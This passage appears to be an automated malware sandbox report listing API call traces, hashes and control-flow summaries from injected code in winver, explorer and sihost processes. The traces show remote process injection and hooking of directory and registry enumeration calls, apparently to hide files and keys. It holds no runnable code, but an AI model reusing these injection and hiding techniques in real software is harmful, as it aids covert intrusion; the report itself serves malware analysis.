                • Part of subcall function 00D42ECB: CryptDestroyKey.ADVAPI32(?), ref: 00D42F79
                • Part of subcall function 00D42ECB: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D42F87
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Crypt$Hash$ContextDestroy$AcquireBinaryCreateDataDecodeImportInfoObjectPublicReleaseSignatureStringVerify
              • String ID:
              • API String ID: 1317902371-0
              • Opcode ID: 8354e4fbaef6a43054a49a658050928748deb7c72ae58bd6602e066a0f6c0e37
              • Instruction ID: 21f7d4811debc8fcedbba5858d99c7eb35ad4ea232d60c9e91d1a5c02bcb9765
              • Opcode Fuzzy Hash: 8354e4fbaef6a43054a49a658050928748deb7c72ae58bd6602e066a0f6c0e37
              • Instruction Fuzzy Hash: 50416031544218BFEF224F20CC85FE9B7B9EF04B00F4402D5BA85AE095DBB09994CFA4
              APIs
              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00D42E9C,0000002F,?,00000000,00000001,F0000000), ref: 00D42EDC
              • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 00D42F02
              • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 00D42F25
              • CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 00D42F3F
              • CryptVerifySignatureA.ADVAPI32(?,00000000,-00000004,?,00000000,00000000), ref: 00D42F5F
              • CryptDestroyHash.ADVAPI32(?), ref: 00D42F6D
              • CryptDestroyKey.ADVAPI32(?), ref: 00D42F79
              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D42F87
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportInfoPublicReleaseSignatureVerify
              • String ID:
              • API String ID: 295346115-0
              • Opcode ID: f40c9d135dbbaf6ec7dd8b54680c9dfcd460e274785a9cddeeabdc8bf7b7b054
              • Instruction ID: d4d669ad2c4327723f35aca186a7658162f49f963de97660c1afd0252b2d6c42
              • Opcode Fuzzy Hash: f40c9d135dbbaf6ec7dd8b54680c9dfcd460e274785a9cddeeabdc8bf7b7b054
              • Instruction Fuzzy Hash: 0D11EC71644114BBEF221F20CC85FE97B75EF54700F5441D4BA89BD0A4DBB19AA0DF68
              APIs
              • Sleep.KERNEL32(00001388), ref: 00D4099A
              • RtlExitUserThread.NTDLL(00000000), ref: 00D409A2
              • OpenMutexA.KERNEL32(001F0001,00000000), ref: 00D409C2
              • GetStartupInfoA.KERNEL32(00000000), ref: 00D409DA
                • Part of subcall function 00D40A1A: CreateProcessA.KERNEL32(00000000,00D40A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 00D40A21
                • Part of subcall function 00D40A1A: GetThreadContext.KERNEL32(?,00000000), ref: 00D40A49
                • Part of subcall function 00D40A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 00D40A74
                • Part of subcall function 00D40A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,00D459C8,00000000,00000000,00000002), ref: 00D40AB9
                • Part of subcall function 00D40A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 00D40AE7
                • Part of subcall function 00D40A1A: ResumeThread.KERNEL32(?), ref: 00D40AF7
                • Part of subcall function 00D40A1A: Sleep.KERNEL32(000003E8), ref: 00D40B07
                • Part of subcall function 00D40A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 00D40B1E
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
              • String ID:
              • API String ID: 1099281029-0
              • Opcode ID: 761bbbead5cd20da5c35d35d56282458c15599a2a0f4afc317e9a196e341a1d2
              • Instruction ID: 0304a726e795ef86091dff0e8aeb449839f4511edb46109873e6a4d18364f8f8
              • Opcode Fuzzy Hash: 761bbbead5cd20da5c35d35d56282458c15599a2a0f4afc317e9a196e341a1d2
              • Instruction Fuzzy Hash: 2A413071640214AFEB129F60CC85FA977BCEF44744F080195BB49FE0D6DB709A94CA69
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 00D435AA
              • lstrcat.KERNEL32(00000000,00D435B5), ref: 00D435B9
              • Process32Next.KERNEL32(00000000,00000000), ref: 00D435CA
              • lstrlen.KERNEL32(00000000), ref: 00D435D5
                • Part of subcall function 00D427B3: VirtualAlloc.KERNEL32(00000000,-00000005,00003000,00000004,?,00000000), ref: 00D427CE
                • Part of subcall function 00D427B3: VirtualFree.KERNEL32(-00000005,00000000,00008000,00000000,-00000005,-00000005,00000004,?,00000000), ref: 00D4284E
              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,000000C9), ref: 00D435EF
              • CloseHandle.KERNEL32(00000000), ref: 00D435F6
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Virtual$Freelstrcat$AllocCloseHandleNextProcess32lstrlen
              • String ID: W
              • API String ID: 1151960628-655174618
              • Opcode ID: 21e0c4b316834c90e5a0ec7aeb5a7caae152be6646dd53a42859772c0c124739
              • Instruction ID: 415552966565eb575c42a4022d847bf5e26251e6a7ef49f2bc22234fb211b4f8
              • Opcode Fuzzy Hash: 21e0c4b316834c90e5a0ec7aeb5a7caae152be6646dd53a42859772c0c124739
              • Instruction Fuzzy Hash: CDF03C71205550AFEB126F208CC9FBE3ABCAF41705F0400A8FE85F905ADBA446569A7A
              APIs
              • CreateProcessA.KERNEL32(00000000,00D40A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 00D40A21
              • GetThreadContext.KERNEL32(?,00000000), ref: 00D40A49
              • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 00D40A74
              • DuplicateHandle.KERNEL32(000000FF,000000FF,?,00D459C8,00000000,00000000,00000002), ref: 00D40AB9
              • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 00D40AE7
              • ResumeThread.KERNEL32(?), ref: 00D40AF7
              • Sleep.KERNEL32(000003E8), ref: 00D40B07
              • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 00D40B1E
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
              • String ID:
              • API String ID: 617592159-0
              • Opcode ID: 9f95e6e505d3003ba15fac6590d4d8585dd5cd7f164cf91579dc4005578e3fd0
              • Instruction ID: 74762b9d3e954f04d872fae6ab94741d9e3f33f8878bd30e9eccb4eeb2b7a56e
              • Opcode Fuzzy Hash: 9f95e6e505d3003ba15fac6590d4d8585dd5cd7f164cf91579dc4005578e3fd0
              • Instruction Fuzzy Hash: 26315E71640218AFEF228F50CC85FA977B8FF04744F080198AB59FE0E6DB709A90CE64
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 00D432E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 00D43330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00D432B1,00000011,?,00000000,00A00000), ref: 00D4335D
              • CloseHandle.KERNEL32(?,?,00D432B1,00000011,?,00000000,00A00000,00A00000,00D4316A,00000004,00000000), ref: 00D43369
              • CloseHandle.KERNEL32(?,?,00D432B1,00000011,?,00000000,00A00000,00A00000,00D4316A,00000004,00000000), ref: 00D43375
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 4a7d3bdf96bcd136d845fcf4cc7e61d2247fbc6a5559b8647c627d2f57814357
              • Instruction ID: aa406fb617d6373c3f08347d7dee6bcbcca70db8e768b79053c2b29d5074f383
              • Opcode Fuzzy Hash: 4a7d3bdf96bcd136d845fcf4cc7e61d2247fbc6a5559b8647c627d2f57814357
              • Instruction Fuzzy Hash: CB11FEB2404518AFEF12AB64CC89FAFB7F9EF50305F4544A9E985A6045DA349A808EB1
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 00D432E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 00D43330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00D432B1,00000011,?,00000000,00A00000), ref: 00D4335D
              • CloseHandle.KERNEL32(?,?,00D432B1,00000011,?,00000000,00A00000,00A00000,00D4316A,00000004,00000000), ref: 00D43369
              • CloseHandle.KERNEL32(?,?,00D432B1,00000011,?,00000000,00A00000,00A00000,00D4316A,00000004,00000000), ref: 00D43375
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 42ff20205ee4aab94cd3072db40cb3a758061773956fc6871cc72a3358a69797
              • Instruction ID: 488b3fae5da41ae81d60491fb1ebcee65ce1f8a9d3fca208a938cf996747e011
              • Opcode Fuzzy Hash: 42ff20205ee4aab94cd3072db40cb3a758061773956fc6871cc72a3358a69797
              • Instruction Fuzzy Hash: 86111FB28045589FEF126F64CC89BAFB7F8EF40305F4544A9E985A6005DA349A80CEB1
              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,?,00D43FD4,0000000A,?,00000000,0000000A), ref: 00D43FFE
              • Sleep.KERNEL32(000003E8,00000000,?,00D43FD4,0000000A,?,00000000,0000000A), ref: 00D44020
              • Sleep.KERNEL32(000007D0), ref: 00D44030
              • Sleep.KERNEL32(00000BB8), ref: 00D44040
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Sleep$HandleModule
              • String ID:
              • API String ID: 3646095425-0
              • Opcode ID: 6670859622c68b8e8afc5423a292660a4c178c6049e802073782c2936fe328c1
              • Instruction ID: bc9865ec1f299943c5a1066cb7d0468e1823c833a536fb657a23b8603252000d
              • Opcode Fuzzy Hash: 6670859622c68b8e8afc5423a292660a4c178c6049e802073782c2936fe328c1
              • Instruction Fuzzy Hash: 92F0C970548390EBFB517BB0DC8AB4D36A8DF41709F040091FB8ABE496CE7885E09E76

              Execution Graph

              Execution Coverage:6.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:140
              Total number of Limit Nodes:9
              execution_graph 4759 f81fa8 4760 f81fcc 4759->4760 4761 f81fb6 4759->4761 4763 f81fd7 VirtualAllocEx WriteProcessMemory CreateRemoteThread 4761->4763 4763->4760 4924 f809a8 4925 f809c8 4924->4925 4926 f80a13 4925->4926 4927 f80a1a 5 API calls 4925->4927 4927->4926 4903 f822ba 4904 f822d5 NtQueryDirectoryFile 4903->4904 4905 f82341 4904->4905 4906 f82385 4904->4906 4905->4904 4905->4906 4764 f81f2b NtCreateUserProcess 4765 f8221b 4768 f8223c 4765->4768 4766 f8225b NtEnumerateValueKey 4767 f822b6 4766->4767 4766->4768 4768->4766 4768->4767 4769 f8237e 4770 f82341 4769->4770 4771 f822d5 NtQueryDirectoryFile 4770->4771 4772 f82385 4770->4772 4771->4770 4771->4772 4945 2df09a8 4946 2df09c8 4945->4946 4947 2df0a1a 3 API calls 4946->4947 4948 2df0a13 4946->4948 4947->4948 4773 f808e2 4774 f808e8 4773->4774 4775 f80903 4773->4775 4779 f81eac 4774->4779 4789 f80908 4775->4789 4780 f81ebd 4779->4780 4795 f81da4 4780->4795 4783 f81da4 3 API calls 4784 f81f03 4783->4784 4785 f81da4 3 API calls 4784->4785 4786 f81f16 4785->4786 4787 f81da4 3 API calls 4786->4787 4788 f808f6 RtlExitUserThread 4787->4788 4788->4775 4803 f80d05 4789->4803 4791 f80960 4806 f8097f 4791->4806 4793 f80914 4793->4791 4794 f81eac 3 API calls 4793->4794 4794->4791 4796 f81db8 4795->4796 4797 f81eaa 4795->4797 4796->4797 4798 f81dca VirtualProtect 4796->4798 4797->4783 4798->4797 4799 f81df6 4798->4799 4800 f81df9 VirtualAlloc 4799->4800 4800->4800 4801 f81e2b 4800->4801 4802 f81e53 VirtualProtect 4801->4802 4802->4797 4811 f80c80 GetPEB 4803->4811 4805 f80d0a 4805->4793 4807 f80d05 GetPEB 4806->4807 4809 f8098b 4807->4809 4808 f80a13 4808->4791 4809->4808 4813 f80a1a 4809->4813 4812 f80c8c 4811->4812 4812->4805 4812->4812 4816 f80a1f 4813->4816 4814 f80b32 4814->4808 4816->4814 4817 f80b34 4816->4817 4819 f80b42 4817->4819 4820 f80d05 GetPEB 4819->4820 4821 f80b4e 4820->4821 4830 f80b68 4821->4830 4823 f80b61 4838 f80ba6 4823->4838 4825 f80b98 4844 f808e2 4825->4844 4831 f80b6d 4830->4831 4832 f80ba6 5 API calls 4831->4832 4836 f80b98 4832->4836 4833 f808e2 5 API calls 4834 f80bf2 4833->4834 4835 f80c80 GetPEB 4834->4835 4837 f80bf7 4835->4837 4836->4833 4837->4823 4839 f80bab 4838->4839 4840 f808e2 5 API calls 4839->4840 4841 f80bf2 4840->4841 4842 f80c80 GetPEB 4841->4842 4843 f80bf7 4842->4843 4843->4825 4845 f808e8 4844->4845 4846 f80903 4844->4846 4848 f81eac 3 API calls 4845->4848 4847 f80908 4 API calls 4846->4847 4847->4846 4849 f808f6 RtlExitUserThread 4848->4849 4849->4846 4928 f83f94 4929 f83f99 4928->4929 4931 f83fa3 4929->4931 4932 f83fde 4929->4932 4933 f83fe3 4932->4933 4936 f83ffc 4933->4936 4942 f8404d 4933->4942 4935 f8401b 4937 f8404d GetPEB 4935->4937 4936->4931 4938 f8402b 4937->4938 4939 f8404d GetPEB 4938->4939 4940 f8403b 4939->4940 4940->4936 4941 f8404d GetPEB 4940->4941 4941->4936 4943 f84063 GetPEB 4942->4943 4944 f84072 4942->4944 4943->4944 4944->4935 4850 2df08e2 4852 2df08e8 4850->4852 4853 2df0908 4852->4853 4859 2df0d05 4853->4859 4855 2df097a 4862 2df097f 4855->4862 4857 2df0914 4857->4855 4858 2df0960 SleepEx RtlExitUserThread 4857->4858 4858->4855 4867 2df0c80 GetPEB 4859->4867 4861 2df0d0a 4861->4857 4863 2df0d05 GetPEB 4862->4863 4864 2df098b 4863->4864 4866 2df0a13 4864->4866 4869 2df0a1a 4864->4869 4866->4855 4868 2df0c8c 4867->4868 4868->4861 4868->4868 4872 2df0a1f 4869->4872 4871 2df0b32 4871->4866 4872->4871 4873 2df0b34 4872->4873 4875 2df0b42 4873->4875 4876 2df0d05 GetPEB 4875->4876 4877 2df0b4e 4876->4877 4886 2df0b68 4877->4886 4879 2df0b61 4894 2df0ba6 4879->4894 4884 2df0b98 4900 2df08e2 4884->4900 4887 2df0b6d 4886->4887 4888 2df0ba6 3 API calls 4887->4888 4892 2df0b98 4888->4892 4889 2df08e2 3 API calls 4890 2df0bf2 4889->4890 4891 2df0c80 GetPEB 4890->4891 4893 2df0bf7 4891->4893 4892->4889 4893->4879 4895 2df0bab 4894->4895 4896 2df08e2 3 API calls 4895->4896 4897 2df0bf2 4896->4897 4898 2df0c80 GetPEB 4897->4898 4899 2df0bf7 4898->4899 4899->4884 4902 2df08e8 4900->4902 4901 2df0908 3 API calls 4901->4902 4902->4901

              Control-flow Graph

              APIs
              • VirtualAllocEx.KERNELBASE ref: 00F82028
              • WriteProcessMemory.KERNEL32 ref: 00F8204A
              • CreateRemoteThread.KERNEL32 ref: 00F82072
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f80000_explorer.jbxd
              Similarity
              • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
              • String ID: @
              • API String ID: 1718980022-2766056989
              • Opcode ID: cbd7b8d56efd72a16140fb9055a22f05fc48865d3e098cb5d1dadfcfd1d963b1
              • Instruction ID: 6b1b664621c4495f9d00df8459ed24429872eb362384865df19fe5595f196341
              • Opcode Fuzzy Hash: cbd7b8d56efd72a16140fb9055a22f05fc48865d3e098cb5d1dadfcfd1d963b1
              • Instruction Fuzzy Hash: 5F114F3170C9084FE758EA1CE809B6577DAF7D8331F15036FE48AC3295EE7899168785

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 28 f822ba-f822d2 29 f822d5-f8233b NtQueryDirectoryFile 28->29 30 f823de-f823e2 29->30 31 f82341-f82346 29->31 31->30 32 f8234c-f82353 31->32 32->30 33 f82359-f82365 call f821e0 32->33 36 f8236c-f82370 33->36 37 f82367-f8236a 33->37 39 f823bc-f823bf 36->39 40 f82372-f82377 36->40 38 f823cf-f823d4 37->38 38->30 45 f823d6-f823d9 38->45 43 f823c9-f823cd 39->43 44 f823c1-f823c7 39->44 41 f82379 40->41 42 f82380-f82383 40->42 41->29 46 f82391-f8239f 42->46 47 f82385-f8238f 42->47 43->38 44->38 45->33 48 f823ad 46->48 49 f823a1-f823ab 46->49 47->30 50 f823af-f823ba 48->50 49->50 50->38
              APIs
              • NtQueryDirectoryFile.NTDLL ref: 00F8232B
              Memory Dump Source
              • Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f80000_explorer.jbxd
              Similarity
              • API ID: DirectoryFileQuery
              • String ID:
              • API String ID: 3295332484-0
              • Opcode ID: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
              • Instruction ID: 8fcdaa7c1e5f862b56b8d448f3a96c92ea8ba6b8d5bf28ef1edcbfc130419a1c
              • Opcode Fuzzy Hash: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
              • Instruction Fuzzy Hash: 4D411D30A14A4D8FDFD0FF5CC8A4BA97BE0FB69361F50156AE809C7254D778E8849B41

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 51 f8221b-f8223a 52 f8223c-f82240 51->52 53 f82242-f82247 51->53 54 f82254-f82258 52->54 55 f82249-f8224d 53->55 56 f8224f-f82252 53->56 57 f8225b-f8228e NtEnumerateValueKey 54->57 55->54 56->57 58 f82290-f82293 57->58 59 f822b6-f822b9 57->59 58->59 60 f82295-f822a0 call f821e0 58->60 63 f822a8-f822ab 60->63 64 f822a2-f822a6 60->64 63->59 65 f822ad-f822b4 63->65 64->63 65->57
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f80000_explorer.jbxd
              Similarity
              • API ID: EnumerateValue
              • String ID:
              • API String ID: 1749906896-0
              • Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
              • Instruction ID: d6f1549097ab7dc1a47c669d7d4b4af566ef1bb606e3f0a81b5d29d7f1fadbb2
              • Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
              • Instruction Fuzzy Hash: 99217F31914E1D8F9F90FF18C8056EA77E1FBA8365B410756EC0AD3204C730E98197C1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 66 f81f2b-f81fa7 NtCreateUserProcess
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f80000_explorer.jbxd
              Similarity
              • API ID: CreateProcessUser
              • String ID:
              • API String ID: 2217836671-0
              • Opcode ID: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
              • Instruction ID: 32af6664475258df2025926b18748e272a5399bca74b2e2a3e5bffc18d134367
              • Opcode Fuzzy Hash: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
              • Instruction Fuzzy Hash: 30114C74908A8C8FDFC4EF6CC488A697BE0FB68355F54062AB859C32A0D775D8948B41

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f80000_explorer.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction ID: d5863f9d28ef6cd21516fda7581fbeeffd702fa5daf1f42db2279bdbd315b8a5
              • Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction Fuzzy Hash: 24210730A34C1D0BEB28727C8859764B6D6F79C320F9803A5E90AD36D8ED58DC8287C5

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.3369853200.0000000002DF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2df0000_explorer.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 3177259074d73398496aee8d84e8e5b7fc12ab2389d3e597ac5501920ec841ce
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: CCF05EB2514504AFFB807B709C8887B769DEE40302B4A0535FE4ADA59DED359C148979

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 67 f808e2-f808e6 68 f808e8-f808fd call f817a0 call f81eac RtlExitUserThread 67->68 69 f80903 call f80908 67->69 68->69
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f80000_explorer.jbxd
              Similarity
              • API ID: ExitThreadUser
              • String ID:
              • API String ID: 3424019298-0
              • Opcode ID: 7a05cdd2f0e1a08064be9a74ce13206ca30c34d530db88e3c80cf592066d6b20
              • Instruction ID: 355895e72123fa1c01ace67833bef28f9a5d75cf7239259d572cf507d4e6a4de
              • Opcode Fuzzy Hash: 7a05cdd2f0e1a08064be9a74ce13206ca30c34d530db88e3c80cf592066d6b20
              • Instruction Fuzzy Hash: 3CC08C15D30808028E4077702C470DC345CFD103223C00734E402C0187EC2C801EA22A

              Execution Graph

              Execution Coverage:7.5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:83
              Total number of Limit Nodes:5
              execution_graph 2334 d008e2 2335 d008f6 2334->2335 2336 d008e8 2334->2336 2339 d00908 2335->2339 2346 d01eac 2336->2346 2356 d00d05 2339->2356 2341 d00914 2342 d0097a 2341->2342 2344 d01eac 3 API calls 2341->2344 2359 d0097f 2342->2359 2345 d00960 SleepEx RtlExitUserThread 2344->2345 2345->2342 2347 d01ebd 2346->2347 2402 d01da4 2347->2402 2350 d01da4 3 API calls 2351 d01f03 2350->2351 2352 d01da4 3 API calls 2351->2352 2353 d01f16 2352->2353 2354 d01da4 3 API calls 2353->2354 2355 d01f29 2354->2355 2355->2335 2364 d00c80 GetPEB 2356->2364 2358 d00d0a 2358->2341 2360 d00d05 GetPEB 2359->2360 2362 d0098b 2360->2362 2361 d00a13 2361->2342 2362->2361 2366 d00a1a 2362->2366 2365 d00c8c 2364->2365 2365->2358 2365->2365 2369 d00a1f 2366->2369 2368 d00b32 2368->2361 2369->2368 2370 d00b34 2369->2370 2372 d00b42 2370->2372 2373 d00d05 GetPEB 2372->2373 2374 d00b4e 2373->2374 2383 d00b68 2374->2383 2376 d00b61 2391 d00ba6 2376->2391 2381 d00b98 2397 d008e2 2381->2397 2384 d00b6d 2383->2384 2385 d00ba6 6 API calls 2384->2385 2389 d00b98 2385->2389 2386 d008e2 6 API calls 2387 d00bf2 2386->2387 2388 d00c80 GetPEB 2387->2388 2390 d00bf7 2388->2390 2389->2386 2390->2376 2395 d00bab 2391->2395 2392 d008e2 6 API calls 2393 d00bf2 2392->2393 2394 d00c80 GetPEB 2393->2394 2396 d00bf7 2394->2396 2395->2392 2396->2381 2398 d008f6 2397->2398 2399 d008e8 2397->2399 2400 d00908 6 API calls 2398->2400 2401 d01eac 3 API calls 2399->2401 2400->2398 2401->2398 2403 d01db8 2402->2403 2404 d01eaa 2402->2404 2403->2404 2405 d01dca VirtualProtect 2403->2405 2404->2350 2405->2404 2406 d01df6 2405->2406 2407 d01df9 VirtualAlloc 2406->2407 2407->2407 2408 d01e2b 2407->2408 2409 d01e53 VirtualProtect 2408->2409 2409->2404 2414 d03f94 2415 d03f99 2414->2415 2417 d03fa3 2415->2417 2418 d03fde 2415->2418 2419 d03fe3 2418->2419 2422 d03ffc 2419->2422 2428 d0404d 2419->2428 2421 d0401b 2423 d0404d GetPEB 2421->2423 2422->2417 2424 d0402b 2423->2424 2425 d0404d GetPEB 2424->2425 2426 d0403b 2425->2426 2426->2422 2427 d0404d GetPEB 2426->2427 2427->2422 2429 d04063 GetPEB 2428->2429 2430 d04072 2428->2430 2429->2430 2430->2421 2431 d009a8 2432 d009c8 2431->2432 2433 d00a1a 6 API calls 2432->2433 2434 d00a13 2432->2434 2433->2434 2410 d0221b 2412 d0223c 2410->2412 2411 d0225b NtEnumerateValueKey 2411->2412 2413 d022b6 2411->2413 2412->2411 2412->2413

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 27 d0221b-d0223a 28 d02242-d02247 27->28 29 d0223c-d02240 27->29 31 d02249-d0224d 28->31 32 d0224f-d02252 28->32 30 d02254-d02258 29->30 33 d0225b-d0228e NtEnumerateValueKey 30->33 31->30 32->33 34 d02290-d02293 33->34 35 d022b6-d022b9 33->35 34->35 36 d02295-d022a0 call d021e0 34->36 39 d022a2-d022a6 36->39 40 d022a8-d022ab 36->40 39->40 40->35 41 d022ad-d022b4 40->41 41->33
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.3338393026.0000000000D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_d00000_sihost.jbxd
              Similarity
              • API ID: EnumerateValue
              • String ID:
              • API String ID: 1749906896-0
              • Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
              • Instruction ID: b67613b843bd79389cef530c94ed65add13065cffe6e938a298448252ba71ec1
              • Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
              • Instruction Fuzzy Hash: 86218C31814E1D8FCF51EF6888086BA77E5FBA8368B450716E84DD3244C730D88087D5

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.3338393026.0000000000D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_d00000_sihost.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction ID: 64e4a77ac6cbae166c97ec8185b555dd149ef1a7339be5febfc1ff91a105abdd
              • Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction Fuzzy Hash: 2B214D34A34C1D0BEB18A27C8859768F6D2E79C320F9803A9E90ED36D8ED58CC8187D5

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.3338393026.0000000000D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
              Joe Sandbox IDA Plugin
